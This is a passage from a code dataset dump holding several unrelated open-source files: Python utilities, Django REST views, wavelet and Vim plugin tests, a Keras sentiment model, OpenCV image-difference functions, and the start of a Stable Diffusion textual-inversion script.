calculate_difference_in_images(image1: np.ndarray, image2: np.ndarray) -> int:\r\n diff_image = ImageChops.difference(Image.fromarray(image1), Image.fromarray(image2))\r\n diff_array = np.array(diff_image).flatten().astype(\"uint32\")\r\n return (diff_array ** 3).sum()\r\n","repo_name":"gamecraftCZ/patriks_image_compression","sub_path":"src/image_manipulation.py","file_name":"image_manipulation.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"14849486517","text":"import os.path, fnmatch, struct, os\n\ndef summariseList(lst):\n \"\"\"\n Takes a sorted list of numbers, and returns a summary.\n Eg. 
[1, 2, 3, 4, 9] -> [(1, 4), 9]\n [1, 2, 3, 7, 8, 9] -> [(1, 3), (7, 9)]\n \"\"\"\n if len(lst) < 2:\n return lst\n ranges = []\n start = 0\n for i in range(1, len(lst)):\n if (lst[i] - lst[i-1]) > 1:\n if (i-1) == start:\n start = i\n ranges.append(lst[i-1])\n else:\n ranges.append((lst[start], lst[i-1]))\n start = i\n if lst[start] == lst[i]:\n ranges.append(lst[i])\n else:\n ranges.append((lst[start], lst[i]))\n return ranges\n\n\ndef isPathContained(outer, inner):\n \"\"\"\n Does inner lie \"within\" outer?\n Outer has to be an absolute path!\n \"\"\"\n inner = os.path.abspath(inner)\n outer = os.path.abspath(outer)\n if inner[:len(outer)] != outer:\n return False\n elif len(inner) == len(outer):\n return True\n elif inner[len(outer)] in [os.path.sep, os.path.altsep]:\n return True\n return False\n\n\ndef isPathContainedAny(outerList, inner):\n \"\"\"\n Like isPathContained, but with a list of outer directories.\n \"\"\"\n for i in outerList:\n if isPathContained(i, inner):\n return True\n return False\n\n\ndef isStringLike(anobj):\n try:\n # Avoid succeeding expensively if anobj is large.\n anobj[:0]+''\n except:\n return 0\n else:\n return 1\n\n\ndef isNumeric(obj):\n try:\n obj + 0\n except:\n return 0\n else:\n return 1\n\n\ndef _splitSpec(spec):\n \"\"\" \n Takes an input specification, and returns a (path, pattern) tuple.\n\n The splitting works as follows:\n - First, the spec is split on \".\".\n - We then try to maximally match as much as possible of the\n start of the spec to an existing file or directory.\n - The remainder is considered the mark pattern.\n\n If no path is found, the first element of the return tuple is the empty\n string.\n \"\"\"\n parts = spec.split(\".\")\n dirOffset = 0\n fileOffset = 0\n for i in range(1, len(parts) + 1):\n if os.path.isdir(\".\".join(parts[:i])):\n dirOffset = i\n elif os.path.isfile(\".\".join(parts[:i]) + \".py\"):\n fileOffset = i\n if dirOffset > fileOffset:\n target = \".\".join(parts[:dirOffset])\n pattern = \".\".join(parts[dirOffset:])\n elif fileOffset:\n target = \".\".join(parts[:fileOffset]) + \".py\"\n pattern = \".\".join(parts[fileOffset:])\n else:\n target = \"\"\n pattern = \".\".join(parts)\n if target and pattern == \"py\":\n pattern = \"\"\n return target, pattern\n\n\n\n# begin nocover\ndef terminalWidth():\n width = None\n try:\n import fcntl, termios\n cr = struct.unpack('hh', fcntl.ioctl(0, termios.TIOCGWINSZ, '1234'))\n width = int(cr[1])\n except (IOError, ImportError):\n pass\n return width or 80\n","repo_name":"samtaufa/pry","sub_path":"libpry/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"38995900373","text":"from django.shortcuts import render\nfrom django.views import View\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom rest_framework.views import APIView\nfrom rest_framework import viewsets\nfrom .serializers import OperationSerializer, GlobalStatsSerializer\nfrom cotisation.models import Cotisation\nfrom parameter.models import Parameter\nfrom rest_framework import permissions\nfrom django.db.models import Count, Sum\nfrom django.contrib.auth.models import User\nfrom userCredit.models import UserCredit\nfrom credit.models import Credit\nfrom rest_framework.decorators import action\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.response import Response\n\n\nclass 
OperationPage(View):\n template_name = 'dashboard/operations/index.html'\n\n @method_decorator(login_required(login_url='/login'))\n def get(self, request):\n return render(request, self.template_name, {})\n\n\nclass OperationAPI(viewsets.ModelViewSet):\n\n http_method_names = ['get']\n serializer_class = OperationSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n def get_queryset(self):\n\n queryset = Cotisation.objects.raw('SELECT auth_user.id , auth_user.first_name, auth_user.last_name , \\\n ifnull((SELECT SUM(cotisation_cotisation.amount) from cotisation_cotisation where cotisation_cotisation.user_id = auth_user.id),0 ) as sumAmount,\\\n ifnull( (select credit_credit.amount - SUM(userCredit_usercredit.amount) from userCredit_usercredit \\\n join credit_credit on credit_credit.id = userCredit_usercredit.credit_id \\\n where credit_credit.status = \"inprogress\" and credit_credit.user_id=auth_user.id group by userCredit_usercredit.credit_id \\\n ),0 )as creditLeft, \\\n (select userProfile_userprofile.amount from userProfile_userprofile where userProfile_userprofile.user_id = auth_user.id) as cotisation_amount, \\\n ( (select 1 + TIMESTAMPDIFF(MONTH,userProfile_userprofile.start_date,now()) from userProfile_userprofile where userProfile_userprofile.user_id = auth_user.id ) * ( select cotisation_amount) - (select sumAmount) ) as amountLeft \\\n FROM auth_user \\\n group by auth_user.id')\n return queryset\n\n @action(detail=False, url_path=\"get_global_stats\")\n def get_global_stats(self, request):\n\n userCount = User.objects.all().count()\n supposedGlobalSolde = Parameter.supposedAmount()*userCount\n\n globalStates = []\n\n globalSolde = Cotisation.objects.all().aggregate(sumAmount=Sum('amount'))['sumAmount']\n\n if globalSolde:\n globalSoldeLeft = supposedGlobalSolde - globalSolde\n\n globalCredit = Credit.objects.filter(status=\"inprogress\").aggregate(sumAmount=Sum('amount'))['sumAmount']\n globalCredit = globalCredit if globalCredit else 0.0\n\n globalCreditLeft = UserCredit.objects.filter(credit__status=\"inprogress\").aggregate(summs=Sum('amount'))['summs']\n\n if globalCreditLeft:\n globalCreditLeft = globalCredit - globalCreditLeft\n else:\n globalCreditLeft = 0\n\n globalStates.append({'title': 'Solde Globale', 'data': globalSolde})\n globalStates.append({'title': 'Montant Cotisation Restant', 'data': globalSoldeLeft})\n globalStates.append({'title': 'Montant total des credits', 'data': globalCredit})\n globalStates.append({'title': 'Montant credit restant', 'data': globalCreditLeft})\n globstatsSer = GlobalStatsSerializer(globalStates, many=True)\n\n return Response(globstatsSer.data)\n","repo_name":"foxmjay/may1st-bank","sub_path":"operation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33725176168","text":"\"\"\"Test the conv-fwt code.\"\"\"\n# Written by moritz ( @ wolter.tech ) in 2021\nimport numpy as np\nimport pytest\nimport pywt\nimport scipy.misc\nimport torch\n\nfrom src.ptwt._mackey_glass import MackeyGenerator\nfrom src.ptwt._util import _outer\nfrom src.ptwt.conv_transform import (\n _flatten_2d_coeff_lst,\n _translate_boundary_strings,\n wavedec,\n waverec,\n)\nfrom src.ptwt.conv_transform_2 import wavedec2, waverec2\nfrom src.ptwt.wavelets_learnable import SoftOrthogonalWavelet\n\n\n@pytest.mark.parametrize(\"wavelet_string\", [\"db1\", \"db2\", \"db3\", \"db4\", \"db5\", 
\"sym5\"])\n@pytest.mark.parametrize(\"level\", [1, 2, None])\n@pytest.mark.parametrize(\"length\", [64, 65])\n@pytest.mark.parametrize(\"batch_size\", [1, 3])\n@pytest.mark.parametrize(\"mode\", [\"reflect\", \"zero\", \"constant\", \"periodic\"])\n@pytest.mark.parametrize(\"dtype\", [torch.float32, torch.float64])\ndef test_conv_fwt(wavelet_string, level, mode, length, batch_size, dtype):\n \"\"\"Test multiple convolution fwt, for various levels and padding options.\"\"\"\n generator = MackeyGenerator(\n batch_size=batch_size, tmax=length, delta_t=1, device=\"cpu\"\n )\n\n mackey_data_1 = torch.squeeze(generator(), -1).type(dtype)\n wavelet = pywt.Wavelet(wavelet_string)\n ptcoeff = wavedec(mackey_data_1, wavelet, level=level, mode=mode)\n cptcoeff = torch.cat(ptcoeff, -1)\n py_list = []\n for b_el in range(batch_size):\n py_list.append(\n np.concatenate(\n pywt.wavedec(\n mackey_data_1[b_el, :].numpy(), wavelet, level=level, mode=mode\n ),\n -1,\n )\n )\n py_coeff = np.stack(py_list)\n assert np.allclose(\n cptcoeff.numpy(), py_coeff, atol=np.finfo(py_coeff.dtype).resolution\n )\n res = waverec(ptcoeff, wavelet)\n assert np.allclose(mackey_data_1.numpy(), res.numpy()[:, : mackey_data_1.shape[-1]])\n\n\ndef test_ripples_haar_lvl3():\n \"\"\"Compute example from page 7 of Ripples in Mathematics, Jensen, la Cour-Harbo.\"\"\"\n\n class _MyHaarFilterBank(object):\n @property\n def filter_bank(self):\n \"\"\"Unscaled Haar wavelet filters.\"\"\"\n return (\n [1 / 2, 1 / 2.0],\n [-1 / 2.0, 1 / 2.0],\n [1 / 2.0, 1 / 2.0],\n [1 / 2.0, -1 / 2.0],\n )\n\n data = torch.tensor([56.0, 40.0, 8.0, 24.0, 48.0, 48.0, 40.0, 16.0])\n wavelet = pywt.Wavelet(\"unscaled Haar Wavelet\", filter_bank=_MyHaarFilterBank())\n coeffs = wavedec(data, wavelet, level=3)\n assert torch.squeeze(coeffs[0]).numpy() == 35.0\n assert torch.squeeze(coeffs[1]).numpy() == -3.0\n assert (torch.squeeze(coeffs[2]).numpy() == [16.0, 10.0]).all()\n assert (torch.squeeze(coeffs[3]).numpy() == [8.0, -8.0, 0.0, 12.0]).all()\n\n\ndef test_orth_wavelet():\n \"\"\"Test an orthogonal wavelet fwt.\"\"\"\n generator = MackeyGenerator(batch_size=2, tmax=64, delta_t=1, device=\"cpu\")\n\n mackey_data_1 = torch.squeeze(generator())\n # orthogonal wavelet object test\n wavelet = pywt.Wavelet(\"db5\")\n orthwave = SoftOrthogonalWavelet(\n torch.tensor(wavelet.rec_lo),\n torch.tensor(wavelet.rec_hi),\n torch.tensor(wavelet.dec_lo),\n torch.tensor(wavelet.dec_hi),\n )\n res = waverec(wavedec(mackey_data_1, orthwave), orthwave)\n assert np.allclose(res.detach().numpy(), mackey_data_1.numpy())\n\n\ndef test_2d_haar_lvl1():\n \"\"\"Test a 2d-Haar wavelet conv-fwt.\"\"\"\n # ------------------------- 2d haar wavelet tests -----------------------\n face = np.transpose(\n scipy.misc.face()[128 : (512 + 128), 256 : (512 + 256)], [2, 0, 1]\n ).astype(np.float64)\n wavelet = pywt.Wavelet(\"haar\")\n # single level haar - 2d\n coeff2d_pywt = pywt.dwt2(face, wavelet, mode=\"zero\")\n coeff2d = wavedec2(torch.from_numpy(face), wavelet, level=1, mode=\"constant\")\n flat_list_pywt = np.concatenate(_flatten_2d_coeff_lst(coeff2d_pywt), -1)\n flat_list_ptwt = torch.cat(_flatten_2d_coeff_lst(coeff2d), -1)\n assert np.allclose(flat_list_pywt, flat_list_ptwt.numpy())\n rec = waverec2(coeff2d, wavelet).numpy().squeeze()\n assert np.allclose(rec, face)\n\n\ndef test_2d_db2_lvl1():\n \"\"\"Test a 2d-db2 wavelet conv-fwt.\"\"\"\n # single level db2 - 2d\n face = np.transpose(\n scipy.misc.face()[256 : (512 + 128), 256 : (512 + 128)], [2, 0, 1]\n ).astype(np.float64)\n 
wavelet = pywt.Wavelet(\"db2\")\n coeff2d_pywt = pywt.dwt2(face, wavelet, mode=\"reflect\")\n coeff2d = wavedec2(torch.from_numpy(face), wavelet, level=1)\n flat_list_pywt = np.concatenate(_flatten_2d_coeff_lst(coeff2d_pywt), -1)\n flat_list_ptwt = torch.cat(_flatten_2d_coeff_lst(coeff2d), -1)\n assert np.allclose(flat_list_pywt, flat_list_ptwt.numpy())\n # single level db2 - 2d inverse.\n rec = waverec2(coeff2d, wavelet)\n assert np.allclose(rec.numpy().squeeze(), face)\n\n\ndef test_2d_haar_multi():\n \"\"\"Test a 2d-db2 wavelet level 5 conv-fwt.\"\"\"\n # multi level haar - 2d\n face = np.transpose(\n scipy.misc.face()[256 : (512 + 128), 256 : (512 + 128)], [2, 0, 1]\n ).astype(np.float64)\n wavelet = pywt.Wavelet(\"haar\")\n coeff2d_pywt = pywt.wavedec2(face, wavelet, mode=\"reflect\", level=5)\n coeff2d = wavedec2(torch.from_numpy(face), wavelet, level=5)\n flat_list_pywt = np.concatenate(_flatten_2d_coeff_lst(coeff2d_pywt), -1)\n flat_list_ptwt = torch.cat(_flatten_2d_coeff_lst(coeff2d), -1)\n assert np.allclose(flat_list_pywt, flat_list_ptwt)\n # inverse multi level Harr - 2d\n rec = waverec2(coeff2d, wavelet).numpy().squeeze()\n assert np.allclose(rec, face)\n\n\ndef test_outer():\n \"\"\"Test the outer-product implementation.\"\"\"\n a = torch.tensor([1.0, 2.0, 3.0, 4.0, 5.0])\n b = torch.tensor([6.0, 7.0, 8.0, 9.0, 10.0])\n res_t = _outer(a, b)\n res_np = np.outer(a.numpy(), b.numpy())\n assert np.allclose(res_t.numpy(), res_np)\n\n\n@pytest.mark.slow\n@pytest.mark.parametrize(\"wavelet_str\", [\"haar\", \"db2\", \"db3\", \"db4\", \"sym4\"])\n@pytest.mark.parametrize(\"level\", [1, 2, None])\n@pytest.mark.parametrize(\"size\", [(32, 32), (32, 64), (64, 32), (31, 31)])\n@pytest.mark.parametrize(\"mode\", [\"reflect\", \"zero\", \"constant\", \"periodic\"])\ndef test_2d_wavedec_rec(wavelet_str, level, size, mode):\n \"\"\"Ensure pywt.wavedec2 and ptwt.wavedec2 produce the same coefficients.\n\n Wavedec2 and waverec2 invert each other.\n \"\"\"\n face = np.transpose(\n scipy.misc.face()[256 : (512 + size[0]), 256 : (512 + size[1])], [2, 0, 1]\n ).astype(np.float64)\n wavelet = pywt.Wavelet(wavelet_str)\n coeff2d = wavedec2(torch.from_numpy(face), wavelet, mode=mode, level=level)\n pywt_coeff2d = pywt.wavedec2(face, wavelet, mode=mode, level=level)\n for pos, coeffs in enumerate(pywt_coeff2d):\n if type(coeffs) is tuple:\n for tuple_pos, tuple_el in enumerate(coeffs):\n assert (\n tuple_el.shape == torch.squeeze(coeff2d[pos][tuple_pos], 1).shape\n ), \"pywt and ptwt should produce the same shapes.\"\n else:\n assert (\n coeffs.shape == torch.squeeze(coeff2d[pos], 1).shape\n ), \"pywt and ptwt should produce the same shapes.\"\n flat_coeff_list_pywt = np.concatenate(_flatten_2d_coeff_lst(pywt_coeff2d), -1)\n flat_coeff_list_ptwt = torch.cat(_flatten_2d_coeff_lst(coeff2d), -1)\n assert np.allclose(flat_coeff_list_pywt, flat_coeff_list_ptwt.numpy())\n rec = waverec2(coeff2d, wavelet)\n rec = rec.numpy().squeeze()\n assert np.allclose(face, rec[:, : face.shape[1], : face.shape[2]])\n\n\n@pytest.mark.parametrize(\"padding_str\", [\"invalid_padding_name\"])\ndef test_incorrect_padding(padding_str):\n \"\"\"Test expected errors for an invalid padding name.\"\"\"\n with pytest.raises(ValueError):\n _ = 
_translate_boundary_strings(padding_str)\n","repo_name":"raja21068/PyTorch-Wavelet-Toolbox","sub_path":"tests/test_convolution_fwt.py","file_name":"test_convolution_fwt.py","file_ext":"py","file_size_in_byte":7785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"16366189380","text":"import os\nfrom os.path import dirname\n\nclass TestFileObjects(object):\n\n def test_runs_on_whole_file(self, vim, path):\n vim.raw_command(\"e %s\" % path('test_functions.py'))\n vim.normal(\"/foo\")\n result = vim.command(\"Pytest file\")\n assert \"py.test ==> Running tests for entire file\" in result\n vim.normal(\"\")\n vim.raw_command(\"Pytest session\")\n vim.raw_command(\"wincmd p\")\n result = vim.get_buffer()\n assert \"1 failed, 1 passed\" in result\n\n def test_no_tests(self, vim, path):\n vim.raw_command(\"e %s\" % path('test_empty.py'))\n result = vim.command(\"Pytest file\")\n assert \"0 collected tests, no tests ran. See :Pytest session\" in result\n\n\nbase_vimrc = \"\"\"\nsyntax on \" always want syntax highlighting\nfiletype on \" enables filetype detection\nfiletype plugin on \" enables filetype specific plugins\nfiletype indent on \" respect filetype indentation\nset nocompatible\nset rtp+=%s /Users/alfredo/vim/pytest.vim\n\"\"\" % dirname(dirname(dirname(__file__)))\n\n\nclass TestErrorsCustomPytestExecPath(object):\n\n def test_report_uses_custom_executable(self, vim_customized, path, tmpfile):\n pytest_executable = '%s/bin/py.test' % os.getenv('VIRTUAL_ENV')\n custom_executable = '%s/bin/pytest4' % os.getenv('VIRTUAL_ENV')\n if not os.path.exists(custom_executable):\n os.symlink(pytest_executable, custom_executable)\n vimrc = tmpfile(contents=base_vimrc+'let g:pytest_executable = \"pytest4\"')\n vim = vim_customized(vimrc)\n vim.raw_command(\"e %s\" % path('test_functions.py'))\n result = vim.command(\"Pytest file\")\n assert \"pytest4 ==> Running tests for entire file\" in result\n\n\nclass TestErrorsCustomPytestExecFile(object):\n\n def test_report_uses_custom_executable_path(self, vim_customized, path, tmpfile):\n pytest_executable = '%s/bin/py.test' % os.getenv('VIRTUAL_ENV')\n custom_executable = '%s/bin/pytest4' % os.getenv('VIRTUAL_ENV')\n if not os.path.exists(custom_executable):\n os.symlink(pytest_executable, custom_executable)\n vimrc = tmpfile(contents=base_vimrc+'let g:pytest_executable = \"%s\"' % custom_executable)\n vim = vim_customized(vimrc)\n vim.raw_command(\"e %s\" % path('test_functions.py'))\n result = vim.command(\"Pytest file\")\n assert \"pytest4 ==> Running tests for entire file\" in result\n\n","repo_name":"alfredodeza/pytest.vim","sub_path":"tests/functional/test_file.py","file_name":"test_file.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":275,"dataset":"github-code","pt":"3"} +{"seq_id":"30188305154","text":"from keras.preprocessing import sequence\nimport numpy\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Masking\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers.recurrent import LSTM\nfrom keras.datasets import imdb\n\n(X_train, y_train), (X_test, y_test) = imdb.load_data(path=\"imdb.pkl\",\n nb_words=None,\n skip_top=0,\n maxlen=None,\n test_split=0.1)\nk = 0\nfor i in range(X_train.shape[0]):\n k = max(k, len(X_train[i]))\nfor i in range(X_test.shape[0]):\n k = max(k, len(X_test[i]))\n\nX_train = sequence.pad_sequences(X_train, k)\nX_test = sequence.pad_sequences(X_test, 
k)\n\nmax_features = max(numpy.max(X_train), numpy.max(X_test))\nmaxlen = k\nbatch_size = 32\n\nmodel = Sequential()\nmodel.add(Embedding(max_features, 128, input_length=maxlen))\nmodel.add(LSTM(128))\nmodel.add(Dense(1))\nmodel.add(Activation('sigmoid'))\n\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics = ['accuracy'])\n\nmodel.fit(X_train, y_train, batch_size=batch_size, nb_epoch=1, show_accuracy= True)\n\n# result = model.predict_proba(X)\n","repo_name":"nikitarybkin/my_code","sub_path":"UserReviewAnalyzer.py","file_name":"UserReviewAnalyzer.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36539623801","text":"import cv2\nimport random\nimport numpy as np\n\n\ndef level_1(input_image):\n # Define the number of circles to draw and their properties\n num_circles = 3\n circle_radius = random.randint(10, 20)\n circle_thickness = -1\n\n # Draw the circles in random positions\n for i in range(num_circles):\n # Generate random coordinates for the center of the circle\n center_x = random.randint(circle_radius, input_image.shape[1] - circle_radius)\n center_y = random.randint(circle_radius, input_image.shape[0] - circle_radius)\n center = (center_x, center_y)\n\n circle_color = (np.random.uniform(0, 255), np.random.uniform(0, 255), np.random.uniform(0, 255))\n # Draw the circle\n cv2.circle(input_image, center, circle_radius, circle_color, circle_thickness)\n\n # Save the modified image as output\n cv2.imwrite(\"output_image_level1.jpg\", input_image)\n\n pass\n\ndef level_2(input_image):\n img = input_image.copy()\n img_canny = cv2.Canny(img, 150, 200)\n MAX_CHANGES = 5\n contours, _ = cv2.findContours(img_canny, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)\n for i in range(len(contours)):\n x, y, w, h = cv2.boundingRect(contours[i])\n area = w * h\n rand = np.random.randint(1, 100)\n if area >= 100 and area <= 1000 and rand % 3 == 0:\n new_color = (np.random.uniform(0, 255), np.random.uniform(0, 255), np.random.uniform(0, 255))\n input_image[y:y + h, x:x + w] = new_color\n MAX_CHANGES -= 1\n if MAX_CHANGES == 0:\n break\n\n cv2.imwrite('output_image_level2.jpg', input_image)\n pass\n\n\ndef level_3(input_image):\n img = input_image.copy()\n img_canny = cv2.Canny(img, 150, 200)\n MAX_CHANGES = 5\n contours = [(c, cv2.contourArea(c)) for c in cv2.findContours(img_canny, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)[0]]\n for contour in contours:\n area = contour[1]\n rand = np.random.randint(1, 100)\n if area >= 500 and area <= 3000 and rand % 3 == 0:\n new_color = (np.random.uniform(0, 255), np.random.uniform(0, 255), np.random.uniform(0, 255))\n cv2.fillPoly(input_image, [contour[0]], new_color)\n MAX_CHANGES -= 1\n if MAX_CHANGES == 0:\n break\n\n cv2.imwrite('output_image_level3.jpg', input_image)\n pass\n\ndef level_4(input_image):\n img = input_image.copy()\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n img_canny = cv2.Canny(img_gray, 150, 200)\n\n # Find contours\n contours, _ = cv2.findContours(img_canny, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # Find largest contour\n largest_contour = max(contours, key=cv2.contourArea)\n\n # Find bounding box of largest contour\n x, y, w, h = cv2.boundingRect(largest_contour)\n\n size = max(w, h)\n cx, cy = x + w // 2, y + h // 2\n x = cx - size // 2\n y = cy - size // 2\n w, h = size, size\n\n # Extract portion of image within bounding box\n img_roi = img[y:y + h, x:x + w]\n\n # Rotate the image portion by specified angle\n center 
= (w // 2, h // 2)\n rotation_matrix = cv2.getRotationMatrix2D(center, 90, 1)\n rotated_img = cv2.warpAffine(img_roi, rotation_matrix, (w, h))\n\n # Replace the rotated portion in original image\n img[y:y + h, x:x + w] = rotated_img\n\n # Save the output image\n cv2.imwrite('output_image_level4.jpg', img)\n\ndef level_5(input_image):\n img = cv2.imread('input_image.jpg')\n\n # Convert to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Apply Canny edge detection\n canny = cv2.Canny(gray, 100, 200)\n\n # Find contours\n contours, hierarchy = cv2.findContours(canny, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n # Find the largest contour\n largest_contour = max(contours, key=cv2.contourArea)\n\n # Find bounding box of largest contour\n x, y, w, h = cv2.boundingRect(largest_contour)\n\n # Create a mask with the same size as the image\n mask = np.zeros(img.shape[:2], dtype=np.uint8)\n\n # Draw the largest contour on the mask in white color\n cv2.drawContours(mask, [largest_contour], 0, 255, -1)\n\n # Invert the mask\n mask = cv2.bitwise_not(mask)\n\n # Set the pixels inside the contour to black color\n color = img[y, x-5]\n img[mask == 0] = (color)\n cv2.imwrite('output_image_level5.jpg', img)\n\ndef dif(img1, img2):\n diff = cv2.absdiff(img1, img2)\n\n # Convert the difference image to grayscale\n gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)\n\n # Apply thresholding to create a binary image\n _, thresh = cv2.threshold(gray, 30, 255, cv2.THRESH_BINARY)\n\n # Apply morphological operations to remove noise and fill in gaps\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\n thresh = cv2.erode(thresh, kernel, iterations=1)\n thresh = cv2.dilate(thresh, kernel, iterations=1)\n\n # Find contours in the binary imageS\n contours, _ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n # Draw the contours on the original image\n for contour in contours:\n x, y, w, h = cv2.boundingRect(contour)\n cv2.rectangle(img1, (x - 5, y - 5), (x + w + 5, y + h + 5), (0, 0, 255), 2)\n\n diff = cv2.absdiff(img1, img2)\n\n # Convert the difference image to grayscale\n gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)\n\n # Apply thresholding to create a binary image\n _, thresh = cv2.threshold(gray, 30, 255, cv2.THRESH_BINARY)\n\n # Apply morphological operations to remove noise and fill in gaps\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\n thresh = cv2.erode(thresh, kernel, iterations=1)\n thresh = cv2.dilate(thresh, kernel, iterations=1)\n\n # Find contours in the binary image\n contours, _ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n # Draw the contours on the original image\n for contour in contours:\n x, y, w, h = cv2.boundingRect(contour)\n cv2.rectangle(img1, (x - 5, y - 5), (x + w + 5, y + h + 5), (0, 0, 255), 2)\n\n cv2.imwrite('dif_level5.jpg', img1)\n\ndef main():\n input_image = cv2.imread(\"input_image.jpg\")\n output_image = cv2.imread(\"output_image_level5.jpg\")\n #level_1(input_image)\n #level_2(input_image)\n #level_3(input_image)\n #level_4(input_image)\n #level_5(input_image)\n dif(output_image, input_image)\n\nif __name__ == \"__main__\":\n main()","repo_name":"Elyy27/Image_Processing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72789150161","text":"# Darshil Patel\n# December 14, 2022\n# CS7180 Advanced Perception\n# This script contains code for adding a 
new style to a Stable Diffusion model\n# and visually evaluating training and results of image generation using \n# DAAMs (Diffusion Attentive Attribution Maps)\n\nimport argparse\nimport itertools\nimport math\nimport os\nimport random\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torch.utils.checkpoint\nfrom torch.utils.data import Dataset\n\nimport PIL\nfrom accelerate import Accelerator\nfrom accelerate.logging import get_logger\nfrom accelerate.utils import set_seed\nfrom diffusers import AutoencoderKL, DDPMScheduler, PNDMScheduler, StableDiffusionPipeline, UNet2DConditionModel\nfrom diffusers.optimization import get_scheduler\nfrom diffusers.pipelines.stable_diffusion import StableDiffusionSafetyChecker\nfrom PIL import Image\nfrom torchvision import transforms\nfrom tqdm.auto import tqdm\nfrom transformers import CLIPFeatureExtractor, CLIPTextModel, CLIPTokenizer\n\nimport daam\nfrom daam import trace\nfrom diffusers import StableDiffusionPipeline\nfrom matplotlib import pyplot as plt\nimport accelerate\n\ntorch.backends.cudnn.benchmark = True\ntorch.backends.cuda.matmul.allow_tf32 = True\n\n\ndef image_grid(imgs, rows, cols):\n \"\"\"\n Plots images in a grid to display them side by side.\n :param imgs: images to put on gird\n :param rows: number of images per row\n :param rows: number of images per column\n :return: the image\n \"\"\"\n assert len(imgs) == rows * cols\n\n w, h = imgs[0].size\n grid = Image.new('RGB', size=(cols * w, rows * h))\n grid_w, grid_h = grid.size\n\n for i, img in enumerate(imgs):\n grid.paste(img, box=(i % cols * w, i // cols * h))\n return grid\n\n\n\"\"\"## Setup for adding a new concept\"\"\"\n\n# Path for our pre-trained stable diffusion model\npretrained_model_name_or_path = \"stabilityai/stable-diffsion-2\"\n\n# URLs for the images representing our new style \nurls = [\n \"https://www.alexgrey.com/art-images/Psychedelic-Healing---2020-Alex-Grey-smaller-watermarked.jpg\",\n \"https://www.alexgrey.com/art-images/Godself-2012-Alex-Grey-watermarked.jpeg\",\n \"https://www.alexgrey.com/art-images/Rainbow-Eye-Ripple-2019-Alex-Grey-Allyson-Grey-watermarked.jpeg\"]\n\n# Display the training images\nimport requests\nimport glob\nfrom io import BytesIO\n\n\ndef download_image(url):\n try:\n response = requests.get(url)\n except:\n return None\n return Image.open(BytesIO(response.content)).convert(\"RGB\")\n\n\nimages = list(filter(None, [download_image(url) for url in urls]))\nsave_path = \"./my_concept\"\nif not os.path.exists(save_path):\n os.mkdir(save_path)\n[image.save(f\"{save_path}/{i}.jpeg\") for i, image in enumerate(images)]\nimage_grid(images, 1, len(images))\n\n# Setup tokens and parameters for teaching the model\n# Here we set up the tokens that we use to train the concept in the model\nwhat_to_teach = \"style\"\nplaceholder_token = \"\"\ninitializer_token = \"ag\"\n\n# Training the model using the textual inversion method\n\n# Create Dataset\n\n# These prompts are sampled from Google ImageGen templates and are suitable to \n# help teach the new concept in the text embedding space\nimagenet_templates_small = [\n \"a photo of a {}\",\n \"a rendering of a {}\",\n \"a cropped photo of the {}\",\n \"the photo of a {}\",\n \"a photo of a clean {}\",\n \"a photo of a dirty {}\",\n \"a dark photo of the {}\",\n \"a photo of my {}\",\n \"a photo of the cool {}\",\n \"a close-up photo of a {}\",\n \"a bright photo of the {}\",\n \"a cropped photo of a {}\",\n \"a photo of the {}\",\n \"a good photo of the {}\",\n \"a photo 
of one {}\",\n \"a close-up photo of the {}\",\n \"a rendition of the {}\",\n \"a photo of the clean {}\",\n \"a rendition of a {}\",\n \"a photo of a nice {}\",\n \"a good photo of a {}\",\n \"a photo of the nice {}\",\n \"a photo of the small {}\",\n \"a photo of the weird {}\",\n \"a photo of the large {}\",\n \"a photo of a cool {}\",\n \"a photo of a small {}\",\n]\n\nimagenet_style_templates_small = [\n \"a painting in the style of {}\",\n \"a rendering in the style of {}\",\n \"a cropped painting in the style of {}\",\n \"the painting in the style of {}\",\n \"a clean painting in the style of {}\",\n \"a dirty painting in the style of {}\",\n \"a dark painting in the style of {}\",\n \"a picture in the style of {}\",\n \"a cool painting in the style of {}\",\n \"a close-up painting in the style of {}\",\n \"a bright painting in the style of {}\",\n \"a cropped painting in the style of {}\",\n \"a good painting in the style of {}\",\n \"a close-up painting in the style of {}\",\n \"a rendition in the style of {}\",\n \"a nice painting in the style of {}\",\n \"a small painting in the style of {}\",\n \"a weird painting in the style of {}\",\n \"a large painting in the style of {}\",\n]\n\n\n# Setup the dataset\nclass 